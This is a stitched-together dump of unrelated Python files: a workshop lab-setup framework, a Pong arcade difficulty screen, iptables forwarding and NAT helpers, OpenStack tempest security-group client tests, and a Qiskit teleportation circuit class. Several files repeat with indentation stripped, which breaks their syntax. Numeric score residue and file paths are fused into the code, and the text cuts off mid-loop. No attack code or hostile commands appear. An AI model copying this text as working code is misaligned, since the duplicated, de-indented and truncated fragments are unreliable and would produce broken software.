    LOG.debug('Request: method: %s, url: %s, auth: %s, verify: %s, kwargs: %s',
              method, url, 'yes' if auth else 'no', truststore, kwargs)
    resp = requests.request(method, url, auth=auth, verify=truststore, **kwargs)
    if resp.status_code != expected_code:
        raise RuntimeError('Request to URL %s returned code %s (expected was %s), Response: %s' % (
            resp.url, resp.status_code, expected_code, resp.text))
    return resp
class AbstractWorkshopMeta(ABCMeta):
    """Metaclass that auto-registers every workshop class in WORKSHOPS."""

    def __init__(cls, name, bases, dct):
        type.__init__(cls, name, bases, dct)
        # Register under the id the class reports; classes whose
        # workshop_id() is falsy (e.g. the abstract base, whose body is
        # just ``pass``) are skipped.
        if cls.workshop_id():
            WORKSHOPS[cls.workshop_id()] = cls
class AbstractWorkshop(metaclass=AbstractWorkshopMeta):
    """Base class for workshops composed of numbered ``labNN`` setup methods."""

    def __init__(self, run_id=None, context=None):
        class _Context(object):
            pass
        # The context object is shared with prereq workshops so they can
        # exchange data with each other.
        self.context = context or _Context()
        self.run_id = run_id if run_id is not None else get_run_id()

    @classmethod
    @abstractmethod
    def workshop_id(cls):
        """Return a short string to identify the workshop."""
        pass

    @classmethod
    @abstractmethod
    def prereqs(cls):
        """
        Return a list of prereqs for this workshop. The list can contain either:
        - Strings identifying the name of other workshops that need to be setup before this one does. In
        this case all the labs of the specified workshop will be setup.
        - Tuples (String, Integer), where the String specifies the name of the workshop and Integer the number
        of the last lab of that workshop to be executed/setup.
        """
        pass

    def before_setup(self):
        """Hook executed before any lab setup method runs."""
        pass

    def after_setup(self):
        """Hook executed after all lab setup methods have run."""
        pass

    @abstractmethod
    def teardown(self):
        """Undo everything this workshop's labs created."""
        pass

    def _setup_prereqs(self):
        """Run setup for every prereq workshop, up to its requested lab."""
        global WORKSHOPS
        for prereq in self.prereqs():
            if isinstance(prereq, str):
                workshop = prereq
                lab = 99  # 99 means "run every lab"
            else:
                workshop, lab = prereq
            LOG.info('Executing prereqs setup: Workshop {}, Lab < {}'.format(workshop, lab))
            WORKSHOPS[workshop](self.run_id, self.context).execute_setup(lab)

    def _teardown_prereqs(self):
        """Tear down every prereq workshop."""
        global WORKSHOPS
        for prereq in self.prereqs():
            if isinstance(prereq, str):
                workshop = prereq
            else:
                workshop, _ = prereq
            LOG.info('Executing prereqs teardown: Workshop {}'.format(workshop))
            WORKSHOPS[workshop](self.run_id, self.context).execute_teardown()

    def execute_setup(self, target_lab=99):
        """Run prereqs, hooks and every labNN method with NN < target_lab."""
        self._setup_prereqs()
        self.before_setup()
        lab_setup_functions = [(n, f, _get_step_number(n)) for n, f in
                               getmembers(self.__class__) if _get_step_number(n) is not None]
        # Fix: getmembers() yields names alphabetically, which would run
        # e.g. lab10 before lab2; order the labs by their numeric suffix.
        lab_setup_functions.sort(key=lambda entry: entry[2])
        # Fix: str(map(...)) logged a useless "<map object ...>" repr.
        LOG.debug("Found Lab Setup Functions: %s", str([num for _, _, num in lab_setup_functions]))
        for func_name, func, lab_number in lab_setup_functions:
            if lab_number < target_lab:
                LOG.info("Executing {}::{}".format(self.workshop_id(), func_name))
                func(self)
            else:
                LOG.debug("[{0}] is numbered higher than target [lab{1}], skipping".format(func_name, target_lab))
        self.after_setup()
        return self.context

    def execute_teardown(self):
        """Tear down this workshop and then its prereqs."""
        self.teardown()
        self._teardown_prereqs()

    def get_artifacts_dir(self):
        """Return the artifacts directory bundled with this workshop."""
        return os.path.join(os.path.dirname(__file__), 'artifacts', self.workshop_id())
def _load_workshops():
    """Import every workshop_*.py module so its classes self-register."""
    base_dir = get_base_dir()
    for f in os.listdir(base_dir):
        if f.startswith('workshop_') and os.path.isfile(os.path.join(base_dir, f)):
            # Convert the file name to a relative module name for import.
            f = '.' + f.replace('.py', '')
            import_module(f, package=__package__)


def global_setup(target_workshop='base', target_lab=99, run_id=None):
    """Run setup for *target_workshop* up to (but excluding) lab *target_lab*."""
    _load_workshops()
    if target_workshop in WORKSHOPS:
        # Fix: the original message swapped the lab and workshop arguments.
        LOG.info('Executing setup for Lab {} in Workshop {}'.format(target_lab, target_workshop))
        WORKSHOPS[target_workshop](run_id).execute_setup(target_lab)
    else:
        raise RuntimeError("Workshop [{}] not found. Known workshops are: {}".format(target_workshop, WORKSHOPS))
    LOG.info('Global setup completed successfully!')


def global_teardown(target_workshop='base', run_id=None):
    """Tear down one workshop, or all of them when target_workshop is None."""
    _load_workshops()
    if target_workshop is not None:
        LOG.info('Executing teardown for Workshop {}'.format(target_workshop))
        WORKSHOPS[target_workshop](run_id).execute_teardown()
    else:
        for target_workshop in WORKSHOPS:
            LOG.info('Executing teardown for Workshop {}'.format(target_workshop))
            WORKSHOPS[target_workshop](run_id).execute_teardown()
    LOG.info('Global teardown completed successfully!')
@contextmanager
def exception_context(obj):
    """Context manager that prints *obj* when the wrapped block raises."""
    try:
        yield
    except:
        # Deliberately bare: any raiser gets the context printed, then the
        # exception propagates unchanged.
        timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        print('%s - Exception context: %s' % (timestamp, obj))
        raise
def retry_test(max_retries=0, wait_time_secs=0):
    """Decorator retrying the wrapped callable on any Exception.

    Retries up to *max_retries* times, sleeping *wait_time_secs* between
    attempts, and re-raises the last exception when retries are exhausted.
    Fixes: the wrapped function's return value was silently discarded, and
    the original last line was fused with dataset score residue.
    """
    def wrap(f):
        def wrapped_f(*args, **kwargs):
            retries = 0
            while True:
                try:
                    # Fix: propagate f's result instead of dropping it.
                    return f(*args, **kwargs)
                except Exception:
                    if retries >= max_retries:
                        raise
                    retries += 1
                    time.sleep(wait_time_secs)
                    print('%s - Retry #%d' % (datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), retries))
        return wrapped_f
    return wrap
from ...UI.Base import Document
from ...UI.Elements import div,img,label,radio
from ...Core.DataTypes.UI import EventListener
from ...UI.CustomElements import AspectRatioPreservedContainer
class CreateGame(Document):
Name = "Pong/Arcade/CreateGame"
StyleSheet = "Styles/Arcade/CreateGame.json"
ResourceKey = "Arcade"
    def __init__(self, *args, **kwargs):
        """Build the Arcade "Create Game" (difficulty selection) screen."""
        super().__init__(*args, **kwargs)
        # region Background
        container = AspectRatioPreservedContainer() # The container
        self.Children += container # Add child
        background = img(self.Window.Resources.Images.Background,classes = ".background") # The background
        container.Children += background # Add child
        # endregion
        # title
        title = label(text="Arcade", classes = ".title")
        background.Children += title
        # region goHomeButton
        # Clicking the home icon navigates back to the main menu.
        goHomeButton = img(self.Window.Resources.Images.Home, classes = ".goHome .imgButton")
        goHomeButton.EventListeners += EventListener("<Button-1>", lambda e:self.NavigateTo("MainMenu"))
        background.Children += goHomeButton
        # endregion
        # The selection box contents are filled in by PopulateDifficultyBox().
        self.SelectDifficultyBox = div(classes = ".selectionBox")
        background.Children += self.SelectDifficultyBox
        self.PopulateDifficultyBox()
def PopulateDifficultyBox(self):
mintitle = label(classes = ".miniTitle", text = "Select Difficulty")
self.SelectDifficultyBox.Children += mintitle
self.OptionsRadio = radio(classes = ".optionsRadio")
self.SelectDifficultyBox.Children += self.OptionsRadio
self.OptionsRadio.Children += label(text = "Beginner",classes = ".option .lvl1")
self.OptionsRadio.Children += label(text = "Novice",classes = ".option .lvl2")
self.OptionsRadio.Children += label(text = "Amateur",classes = ".option .lvl3")
self.OptionsRadio.Children += label(text = "Expert",classes = ".option .lvl4")
self.OptionsRadio.Children += label(text = "Impossible",classes = ".option .lvl5")
self.OptionsRadio.SelectedElement = self.OptionsRadio.Children[0]
startButton = label(text="Start", classes = ".startButton")
startButton.EventListeners += EventListener("<Button-1>", lambda e:self.NavigateTo("PlayGame"))
self.SelectDifficultyBox.Children += startButton
def NavigateTo(self, dest):
if dest == "MainMenu":
from ..MainMenu import MainMenu
self.Window.ChangeDocumentTo(MainMenu)
elif dest == "PlayGame":
self.SetSettings()
from .PlayGame import PlayGame
self.Window.ChangeDocumentTo(PlayGame)
def SetSettings(self):
difficulty = self.OptionsRadio.SelectedElement.Text
if difficulty == "Beginner":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Beginner'
elif difficulty == "Novice":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 40,
"DifficultySlope" : 0.01,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Novice'
elif difficulty == "Amateur":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0.1,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Amateur'
elif difficulty == "Expert":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0.1,
"BallCount" : 2,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Expert'
elif difficulty == "Impossible":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 40,
"DifficultySlope" : 0.01,
"BallCount" : 5,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Impossible' | Client/App/Views/Arcade/CreateGame.py | from ...UI.Base import Document
from ...UI.Elements import div,img,label,radio
from ...Core.DataTypes.UI import EventListener
from ...UI.CustomElements import AspectRatioPreservedContainer
class CreateGame(Document):
Name = "Pong/Arcade/CreateGame"
StyleSheet = "Styles/Arcade/CreateGame.json"
ResourceKey = "Arcade"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# region Background
container = AspectRatioPreservedContainer() # The container
self.Children += container # Add child
background = img(self.Window.Resources.Images.Background,classes = ".background") # The background
container.Children += background # Add child
# endregion
# title
title = label(text="Arcade", classes = ".title")
background.Children += title
# region goHomeButton
goHomeButton = img(self.Window.Resources.Images.Home, classes = ".goHome .imgButton")
goHomeButton.EventListeners += EventListener("<Button-1>", lambda e:self.NavigateTo("MainMenu"))
background.Children += goHomeButton
# endregion
self.SelectDifficultyBox = div(classes = ".selectionBox")
background.Children += self.SelectDifficultyBox
self.PopulateDifficultyBox()
def PopulateDifficultyBox(self):
mintitle = label(classes = ".miniTitle", text = "Select Difficulty")
self.SelectDifficultyBox.Children += mintitle
self.OptionsRadio = radio(classes = ".optionsRadio")
self.SelectDifficultyBox.Children += self.OptionsRadio
self.OptionsRadio.Children += label(text = "Beginner",classes = ".option .lvl1")
self.OptionsRadio.Children += label(text = "Novice",classes = ".option .lvl2")
self.OptionsRadio.Children += label(text = "Amateur",classes = ".option .lvl3")
self.OptionsRadio.Children += label(text = "Expert",classes = ".option .lvl4")
self.OptionsRadio.Children += label(text = "Impossible",classes = ".option .lvl5")
self.OptionsRadio.SelectedElement = self.OptionsRadio.Children[0]
startButton = label(text="Start", classes = ".startButton")
startButton.EventListeners += EventListener("<Button-1>", lambda e:self.NavigateTo("PlayGame"))
self.SelectDifficultyBox.Children += startButton
def NavigateTo(self, dest):
if dest == "MainMenu":
from ..MainMenu import MainMenu
self.Window.ChangeDocumentTo(MainMenu)
elif dest == "PlayGame":
self.SetSettings()
from .PlayGame import PlayGame
self.Window.ChangeDocumentTo(PlayGame)
def SetSettings(self):
difficulty = self.OptionsRadio.SelectedElement.Text
if difficulty == "Beginner":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Beginner'
elif difficulty == "Novice":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 40,
"DifficultySlope" : 0.01,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Novice'
elif difficulty == "Amateur":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0.1,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Amateur'
elif difficulty == "Expert":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0.1,
"BallCount" : 2,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Expert'
elif difficulty == "Impossible":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 40,
"DifficultySlope" : 0.01,
"BallCount" : 5,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Impossible' | 0.349422 | 0.064153 |
import subprocess
from pyroute2 import IPDB
def get_default_iface_name():
    """Return the name of the network interface carrying the default route.

    Opens a pyroute2 IPDB, resolves the output interface ('oif') of the
    default route, and guarantees that the IPDB's netlink resources are
    released even when the route or interface lookup raises.
    """
    ip = IPDB()
    try:
        return ip.interfaces[ip.routes['default']['oif']].get('ifname')
    finally:
        # The original only released on success, leaking the IPDB (and its
        # netlink socket/threads) whenever the lookup raised.
        ip.release()
def iptables_version():
    """Detect which iptables front-end this host uses.

    Runs ``iptables -L`` and inspects stderr: when the legacy-tables warning
    is printed, the system iptables is the nft backend, so 'iptables-nft' is
    returned; otherwise plain 'iptables'.
    """
    # subprocess.run waits for and reaps the child; the original Popen was
    # never wait()ed, leaving a zombie process behind.
    proc = subprocess.run(
        ['iptables', '-L'],
        stderr=subprocess.PIPE,
        stdout=subprocess.DEVNULL,
        check=False,
    )
    # Decode instead of str(bytes), which produced "b'...'" reprs.
    stderr_text = proc.stderr.decode(errors='replace')
    if "Warning: iptables-legacy tables present, use iptables-legacy to see them" in stderr_text:
        return 'iptables-nft'
    return 'iptables'
def iptables_create_syntropy_chain(version='-nft'):
    """Ensure the SYNTROPY_CHAIN chain exists and FORWARD jumps to it."""
    binary = f'iptables{version}'
    # Creating an already-existing chain fails harmlessly; stderr is silenced.
    subprocess.run([binary, '-N', 'SYNTROPY_CHAIN'], stderr=subprocess.DEVNULL)
    jump_rule = ['FORWARD', '-s', '0.0.0.0/0', '-d', '0.0.0.0/0', '-j', 'SYNTROPY_CHAIN']
    try:
        # '-C' exits non-zero when the jump rule is absent.
        subprocess.run([binary, '-C'] + jump_rule, check=True, stderr=subprocess.DEVNULL)
    except subprocess.CalledProcessError:
        # Not present yet: insert it at the top of FORWARD.
        subprocess.run([binary, '-I'] + jump_rule, stderr=subprocess.DEVNULL, check=False)
    if version == '-nft':
        # Mirror the change in the legacy backend as well.
        iptables_create_syntropy_chain(version='-legacy')
def add_iptable_rules(ips: list, version='-nft'):
    """Append an ACCEPT rule to SYNTROPY_CHAIN for every source IP in *ips*."""
    binary = f'iptables{version}'
    for ip in ips:
        rule = ['SYNTROPY_CHAIN', '-p', 'all', '-s', ip, '-j', 'ACCEPT']
        try:
            # '-C' probes whether the rule is already installed.
            subprocess.run([binary, '-C'] + rule, check=True, stderr=subprocess.DEVNULL)
        except subprocess.CalledProcessError:
            # Rule missing: append it.
            subprocess.run([binary, '-A'] + rule, check=False, stderr=subprocess.DEVNULL)
    if version == '-nft':
        # Keep the legacy backend in sync.
        add_iptable_rules(ips, version='-legacy')
def delete_iptable_rules(ips: list, version='-nft'):
    """Best-effort removal of the FORWARD ACCEPT rule for every IP in *ips*."""
    binary = f'iptables{version}'
    for ip in ips:
        # check=False: deleting a non-existent rule must not raise.
        subprocess.run(
            [binary, '-D', 'FORWARD', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
            check=False,
            stderr=subprocess.DEVNULL,
        )
    if version == '-nft':
        # Keep the legacy backend in sync.
        delete_iptable_rules(ips, version='-legacy')
def add_iptables_forward(ifname, version='-nft'):
    """Allow forwarding from *ifname* and masquerade egress traffic."""
    binary = f'iptables{version}'
    forward_rule = ['FORWARD', '-i', ifname, '-j', 'ACCEPT']
    try:
        # '-C' probes whether the forward rule already exists.
        subprocess.run([binary, '-C'] + forward_rule, check=True, stderr=subprocess.DEVNULL)
    except subprocess.CalledProcessError:
        subprocess.run([binary, '-A'] + forward_rule, check=False, stderr=subprocess.DEVNULL)
    # NAT outgoing traffic through the default-route interface.
    subprocess.run(
        [binary, '-t', 'nat', '-A', 'POSTROUTING', '-o', get_default_iface_name(), '-j', 'MASQUERADE'],
        check=False,
        stderr=subprocess.DEVNULL,
    )
    if version == '-nft':
        # Keep the legacy backend in sync.
        add_iptables_forward(ifname, version='-legacy')
from pyroute2 import IPDB
def get_default_iface_name():
ip = IPDB()
interface_name = ip.interfaces[ip.routes['default']['oif']].get('ifname')
ip.release()
return interface_name
def iptables_version():
iptables_proc = subprocess.Popen(['iptables', '-L'], stderr=subprocess.PIPE, stdout=subprocess.DEVNULL)
text = iptables_proc.stderr.read()
if "Warning: iptables-legacy tables present, use iptables-legacy to see them" in str(text):
return 'iptables-nft'
else:
return 'iptables'
def iptables_create_syntropy_chain(version='-nft'):
try:
# Check if already exists, if not - create
subprocess.run([f'iptables{version}', '-N', 'SYNTROPY_CHAIN'], stderr=subprocess.DEVNULL)
subprocess.run(
[f'iptables{version}', '-C', 'FORWARD', '-s', '0.0.0.0/0', '-d', '0.0.0.0/0', '-j', 'SYNTROPY_CHAIN'],
check=True,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError:
subprocess.run(
[f'iptables{version}', '-I', 'FORWARD', '-s', '0.0.0.0/0', '-d', '0.0.0.0/0', '-j', 'SYNTROPY_CHAIN'],
stderr=subprocess.DEVNULL,
check=False
)
if version == '-nft':
iptables_create_syntropy_chain(version='-legacy')
def add_iptable_rules(ips: list, version='-nft'):
for ip in ips:
try:
# Check if already exists, if not - create
subprocess.run(
[f'iptables{version}', '-C', 'SYNTROPY_CHAIN', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
check=True,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError:
subprocess.run(
[f'iptables{version}', '-A', 'SYNTROPY_CHAIN', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
check=False,
stderr=subprocess.DEVNULL
)
if version == '-nft':
add_iptable_rules(ips, version='-legacy')
def delete_iptable_rules(ips: list, version='-nft'):
for ip in ips:
subprocess.run(
[f'iptables{version}', '-D', 'FORWARD', '-p', 'all', '-s', ip, '-j', 'ACCEPT'],
check=False,
stderr=subprocess.DEVNULL
)
if version == '-nft':
delete_iptable_rules(ips, version='-legacy')
def add_iptables_forward(ifname, version='-nft'):
try:
# Check if already exists, if not - create
subprocess.run(
[f'iptables{version}', '-C', 'FORWARD', '-i', ifname, '-j', 'ACCEPT'],
check=True,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError:
subprocess.run(
[f'iptables{version}', '-A', 'FORWARD', '-i', ifname, '-j', 'ACCEPT'],
check=False,
stderr=subprocess.DEVNULL
)
subprocess.run(
[f'iptables{version}', '-t', 'nat', '-A', 'POSTROUTING', '-o', get_default_iface_name(), '-j', 'MASQUERADE'],
check=False,
stderr=subprocess.DEVNULL
)
if version == '-nft':
add_iptables_forward(ifname, version='-legacy') | 0.206494 | 0.067547 |
from oslotest import mockpatch
from tempest.lib import exceptions as lib_exc
from tempest.lib.services.compute import security_groups_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services.compute import base
class TestSecurityGroupsClient(base.BaseComputeServiceTest):
    """Unit tests for the compute SecurityGroupsClient service client.

    Each test mocks the underlying RestClient HTTP verb and verifies that
    the client method parses the canned response body, both when the
    transport returns str and when it returns bytes (``to_utf`` toggles it).
    """

    # Canned API payload reused as the mocked response in every test below.
    FAKE_SECURITY_GROUP_INFO = [{
        "description": "default",
        "id": "3fb26eb3-581b-4420-9963-b0879a026506",
        "name": "default",
        "rules": [],
        "tenant_id": "openstack"
    }]

    def setUp(self):
        """Build a SecurityGroupsClient wired to a fake auth provider."""
        super(TestSecurityGroupsClient, self).setUp()
        fake_auth = fake_auth_provider.FakeAuthProvider()
        self.client = security_groups_client.SecurityGroupsClient(
            fake_auth, 'compute', 'regionOne')

    def _test_list_security_groups(self, bytes_body=False):
        # list_security_groups() must issue a GET and parse the body.
        self.check_service_client_function(
            self.client.list_security_groups,
            'tempest.lib.common.rest_client.RestClient.get',
            {"security_groups": self.FAKE_SECURITY_GROUP_INFO},
            to_utf=bytes_body)

    def test_list_security_groups_with_str_body(self):
        self._test_list_security_groups()

    def test_list_security_groups_with_bytes_body(self):
        self._test_list_security_groups(bytes_body=True)

    def _test_show_security_group(self, bytes_body=False):
        # show_security_group() must GET a single group by id.
        self.check_service_client_function(
            self.client.show_security_group,
            'tempest.lib.common.rest_client.RestClient.get',
            {"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
            to_utf=bytes_body,
            security_group_id='fake-id')

    def test_show_security_group_with_str_body(self):
        self._test_show_security_group()

    def test_show_security_group_with_bytes_body(self):
        self._test_show_security_group(bytes_body=True)

    def _test_create_security_group(self, bytes_body=False):
        # create_security_group() must POST the request body.
        post_body = {"name": "test", "description": "test_group"}
        self.check_service_client_function(
            self.client.create_security_group,
            'tempest.lib.common.rest_client.RestClient.post',
            {"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
            to_utf=bytes_body,
            kwargs=post_body)

    def test_create_security_group_with_str_body(self):
        self._test_create_security_group()

    def test_create_security_group_with_bytes_body(self):
        self._test_create_security_group(bytes_body=True)

    def _test_update_security_group(self, bytes_body=False):
        # update_security_group() must PUT the new attributes for a group id.
        req_body = {"name": "test", "description": "test_group"}
        self.check_service_client_function(
            self.client.update_security_group,
            'tempest.lib.common.rest_client.RestClient.put',
            {"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
            to_utf=bytes_body,
            security_group_id='fake-id',
            kwargs=req_body)

    def test_update_security_group_with_str_body(self):
        self._test_update_security_group()

    def test_update_security_group_with_bytes_body(self):
        self._test_update_security_group(bytes_body=True)

    def test_delete_security_group(self):
        # DELETE returns 202 Accepted with an empty body.
        self.check_service_client_function(
            self.client.delete_security_group,
            'tempest.lib.common.rest_client.RestClient.delete',
            {}, status=202, security_group_id='fake-id')

    def test_is_resource_deleted_true(self):
        # A NotFound from show_security_group means the group is gone.
        mod = ('tempest.lib.services.compute.security_groups_client.'
               'SecurityGroupsClient.show_security_group')
        self.useFixture(mockpatch.Patch(mod, side_effect=lib_exc.NotFound))
        self.assertTrue(self.client.is_resource_deleted('fake-id'))

    def test_is_resource_deleted_false(self):
        # A successful show means the group still exists.
        mod = ('tempest.lib.services.compute.security_groups_client.'
               'SecurityGroupsClient.show_security_group')
        self.useFixture(mockpatch.Patch(mod, return_value='success'))
        self.assertFalse(self.client.is_resource_deleted('fake-id'))
from oslotest import mockpatch
from tempest.lib import exceptions as lib_exc
from tempest.lib.services.compute import security_groups_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services.compute import base
class TestSecurityGroupsClient(base.BaseComputeServiceTest):
FAKE_SECURITY_GROUP_INFO = [{
"description": "default",
"id": "3fb26eb3-581b-4420-9963-b0879a026506",
"name": "default",
"rules": [],
"tenant_id": "openstack"
}]
def setUp(self):
super(TestSecurityGroupsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = security_groups_client.SecurityGroupsClient(
fake_auth, 'compute', 'regionOne')
def _test_list_security_groups(self, bytes_body=False):
self.check_service_client_function(
self.client.list_security_groups,
'tempest.lib.common.rest_client.RestClient.get',
{"security_groups": self.FAKE_SECURITY_GROUP_INFO},
to_utf=bytes_body)
def test_list_security_groups_with_str_body(self):
self._test_list_security_groups()
def test_list_security_groups_with_bytes_body(self):
self._test_list_security_groups(bytes_body=True)
def _test_show_security_group(self, bytes_body=False):
self.check_service_client_function(
self.client.show_security_group,
'tempest.lib.common.rest_client.RestClient.get',
{"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
to_utf=bytes_body,
security_group_id='fake-id')
def test_show_security_group_with_str_body(self):
self._test_show_security_group()
def test_show_security_group_with_bytes_body(self):
self._test_show_security_group(bytes_body=True)
def _test_create_security_group(self, bytes_body=False):
post_body = {"name": "test", "description": "test_group"}
self.check_service_client_function(
self.client.create_security_group,
'tempest.lib.common.rest_client.RestClient.post',
{"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
to_utf=bytes_body,
kwargs=post_body)
def test_create_security_group_with_str_body(self):
self._test_create_security_group()
def test_create_security_group_with_bytes_body(self):
self._test_create_security_group(bytes_body=True)
def _test_update_security_group(self, bytes_body=False):
req_body = {"name": "test", "description": "test_group"}
self.check_service_client_function(
self.client.update_security_group,
'tempest.lib.common.rest_client.RestClient.put',
{"security_group": self.FAKE_SECURITY_GROUP_INFO[0]},
to_utf=bytes_body,
security_group_id='fake-id',
kwargs=req_body)
def test_update_security_group_with_str_body(self):
self._test_update_security_group()
def test_update_security_group_with_bytes_body(self):
self._test_update_security_group(bytes_body=True)
def test_delete_security_group(self):
self.check_service_client_function(
self.client.delete_security_group,
'tempest.lib.common.rest_client.RestClient.delete',
{}, status=202, security_group_id='fake-id')
def test_is_resource_deleted_true(self):
mod = ('tempest.lib.services.compute.security_groups_client.'
'SecurityGroupsClient.show_security_group')
self.useFixture(mockpatch.Patch(mod, side_effect=lib_exc.NotFound))
self.assertTrue(self.client.is_resource_deleted('fake-id'))
def test_is_resource_deleted_false(self):
mod = ('tempest.lib.services.compute.security_groups_client.'
'SecurityGroupsClient.show_security_group')
self.useFixture(mockpatch.Patch(mod, return_value='success'))
self.assertFalse(self.client.is_resource_deleted('fake-id')) | 0.510985 | 0.188137 |
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
class QT:
    """
    Generate an instance of the Quantum Teleportation Protocol.

    Attributes
    ----------
    msg : list of Statevector
        The strand of 1-qubit state vectors that is intended to be sent
    barriers : bool
        Choice to include barriers in circuit or not
    measure : bool
        Choice to measure the teleported qubit at the end or not
    qrname : string
        Name of quantum registers
    crname : string
        Name of classical register holding all teleported bits
    circ : QuantumCircuit
        Qiskit QuantumCircuit that represents the circuit
    """

    def __init__(self, msg=None, barriers=True, measure=True, qrname=None, crname=None):
        if msg is None:
            # ValueError (a subclass of Exception, so existing `except
            # Exception` handlers still match) is the idiomatic error for a
            # missing required argument.
            raise ValueError('Provide list of Statevectors for the Teleportation circuit')
        self.msg = msg
        # Flags controlling circuit generation.
        self.nq = len(msg)  # number of 1-qubit states to teleport
        self.barriers = barriers
        self.measure = measure
        # Each teleported state needs 3 qubits (message qubit + the two
        # halves of a Bell pair) and 2 classical correction bits.
        num_qr = 3 * self.nq
        num_cr = 2 * self.nq
        if qrname is None:
            self.qr = QuantumRegister(num_qr, name="q")
        else:
            self.qr = QuantumRegister(num_qr, name=qrname)
        self.circ = QuantumCircuit(self.qr)
        # One single-bit register per correction bit so that the conditional
        # gates in _decode() can test each bit individually with c_if().
        self.cr = []
        for i in range(num_cr):
            self.cr.append(ClassicalRegister(1))
            self.circ.add_register(self.cr[i])
        # Final register collecting the teleported (output) bits.
        if crname is None:
            self.circ.add_register(ClassicalRegister(self.nq, name="output"))
        else:
            self.circ.add_register(ClassicalRegister(self.nq, name=crname))

    def _create_bell_pair(self, a, b):
        """
        Creates a bell pair

        Inputs
        ------
        a : int
            Left most qubit position
        b : int
            Right most qubit position
        """
        # H then CNOT turns |00> into the (|00> + |11>)/sqrt(2) Bell state.
        self.circ.h(a)
        self.circ.cx(a, b)

    def _bell_state_measurement(self, psi, a):
        """
        Performs a bell state measurement using psi and a qubit indices

        Inputs
        ------
        psi : int
            The index of the qubit that the messenger would like to send
        a : int
            The index of the qubit that is entangled with the receiver's
        """
        self.circ.cx(psi, a)
        self.circ.h(psi)

    def _prepare_cbits(self, q1, q2, c1, c2):
        """
        Measures qubits q1 & q2 on classical registers c1 & c2

        Inputs
        ------
        q1 : int
            The index of one qubit to measure
        q2 : int
            The index of a second qubit to measure
        c1 : ClassicalRegister
            The classical register for q1
        c2 : ClassicalRegister
            The classical register for q2
        """
        self.circ.measure(q1, c1)
        self.circ.measure(q2, c2)

    def _decode(self, qubit, c1, c2):
        """
        Receiver applies gates depending on the classical bits received

        Inputs
        ------
        qubit : int
            The index of the qubit that will receive the teleported qubit
        c1 : ClassicalRegister
            The first classical register to be read from
        c2 : ClassicalRegister
            The second classical register to be read from
        """
        # Standard teleportation corrections: X if the second bit is 1,
        # Z if the first bit is 1.
        self.circ.x(qubit).c_if(c2, 1)
        self.circ.z(qubit).c_if(c1, 1)

    def gen_circuit(self):
        """
        Create a circuit implementing the Quantum Teleportation protocol

        Returns
        -------
        QuantumCircuit
            QuantumCircuit object of size nq
        """
        # Initialize each qubit to be teleported and create its Bell pair.
        for i in range(self.nq):
            self.circ.initialize(self.msg[i].data, 3 * i)
            self._create_bell_pair(3 * i + 1, 3 * i + 2)
            if self.barriers:
                self.circ.barrier([3 * i, 3 * i + 1, 3 * i + 2])
        # Qubit 3i+1 stays with the messenger, 3i+2 goes to the receiver.
        # Messenger performs Bell state measurements.
        for i in range(self.nq):
            self._bell_state_measurement(3 * i, 3 * i + 1)
            if self.barriers:
                self.circ.barrier([3 * i, 3 * i + 1, 3 * i + 2])
        # Messenger prepares the classical bits to send.
        for i in range(self.nq):
            self._prepare_cbits(3 * i, 3 * i + 1, self.cr[2 * i], self.cr[2 * i + 1])
            if self.barriers:
                self.circ.barrier([3 * i, 3 * i + 1, 3 * i + 2])
        # Receiver applies the conditional corrections.
        for i in range(self.nq):
            self._decode(3 * i + 2, self.cr[2 * i], self.cr[2 * i + 1])
        # Receiver measures into the output register (in reversed order)
        # if a classical product state is wanted.
        if self.measure:
            for i in range(self.nq):
